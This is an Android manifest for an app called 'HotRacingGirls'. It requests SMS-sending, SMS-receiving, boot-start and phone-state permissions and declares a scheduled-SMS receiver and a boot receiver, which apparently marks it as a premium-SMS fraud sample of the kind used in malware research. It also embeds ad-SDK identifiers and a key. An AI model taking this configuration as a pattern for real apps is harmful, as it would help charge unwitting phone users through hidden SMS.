<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="my.android4.HotRacingGirls.adm">
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:resizeable="true" android:smallScreens="true"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:label="@string/app_name" android:name="view.MainMenu" android:screenOrientation="portrait"/>
        <activity android:label="@string/app_name" android:name="view.Promo1" android:screenOrientation="portrait"/>
        <activity android:name="view.wap"/>
        <activity android:name="view.Entry" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name="objecthandler.ScheduleSMSService"/>
        <receiver android:name="objecthandler.Reboot">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <activity android:name="net.metaps.sdk.WallActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Light"/>
        <activity android:name="net.metaps.sdk.AppListActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Light"/>
        <activity android:name="net.metaps.sdk.AppDetailActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Light"/>
        <activity android:name="net.metaps.sdk.StatusActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Light"/>
        <meta-data android:name="net.metaps.sdk.CLIENT_ID" android:value="KWISIXJEVP0001"/>
        <meta-data android:name="net.metaps.sdk.APP_ID" android:value="IPGVAUKRAD0001"/>
        <meta-data android:name="net.metaps.sdk.APP_KEY" android:value="3vj6f26dspqes2l"/>
        <meta-data android:name="net.metaps.sdk.PROMOTION_ID" android:value="promotionId"/>
        <meta-data android:name="net.metaps.sdk.MARKET" android:value="market"/>
        <meta-data android:name="net.metaps.sdk.MODE" android:value="0"/>
    </application>
</manifest>
